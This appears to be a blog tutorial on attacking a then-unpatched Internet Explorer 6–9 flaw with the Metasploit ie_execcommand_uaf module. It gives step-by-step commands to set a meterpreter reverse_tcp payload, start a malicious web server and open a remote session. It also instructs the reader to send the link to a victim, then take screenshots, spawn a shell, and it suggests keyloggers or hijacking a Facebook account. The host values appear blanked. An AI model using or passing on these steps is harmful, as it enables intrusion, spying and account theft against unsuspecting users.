Exploiting the Internet Explorer 0day vulnerability with Metasploit

how to exploit the 0day internet explorer flaw with metasploit
how to exploit the 0day internet explorer flaw with metasploit

A new security flaw has just been discovered in Internet Explorer. This is a 0day exploit, which allows an attacker to connect to a remote machine. Internet Explorer browser versions 6 through 9 are affected by the problem except version 10 is not affected.

We wonder how long it will take to Microsoft to propose a patch, while more than 32% of Internet users use Internet Explorer browser.

In the meantime, we'll see how to exploit this flaw with Metasploit Framework.

The module to exploit this flaw is known as "ie_execcommand_uaf ".

Here are the commands to use in Metasploit (here: is the hacker's server, ie you):


msf> svn up (for Metasploit update)
msf> use exploit / windows / browser / ie_execcommand_uaf
msf> set payload windows / meterpreter / reverse_tcp

Here, we load the "reverse_tcp" payload. This piece of shellcode will be executed on the target machine once the vulnerability is exploited. A reverse TCP type connection will then be initialized and will allow you to open a remote session (even through a firewall).

msf> set lhost
msf> set srvhost
msf> set uripath games (this is the URL used for the exploit)

The module being correctly configured, we can launch the attack:

msf> exploit
[*] Started reverse handler on
[*] Using URL:

A temporary web server is then started. You must then send the address of the page to a victim. When she clicks on the link, Metasploit will tell you something like this:

All we have to do now is open a remote session on the machine with the command:


msf> sessions -i 1
[*] Starting interaction with 1

Now you can do whatever you want, like take a screenshot of the desktop:

meterpreter> use espia
Loading extension espia ... success.
meterpreter> screenshot capture.bmp

Or open an MS-DOS dialog box:

meterpreter> shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C: Documents and SettingsAhmedDesktop>

Or to hack a Facebook account. In short, we can really do what we want on the system (turn off the pc, set up a keylogger ...).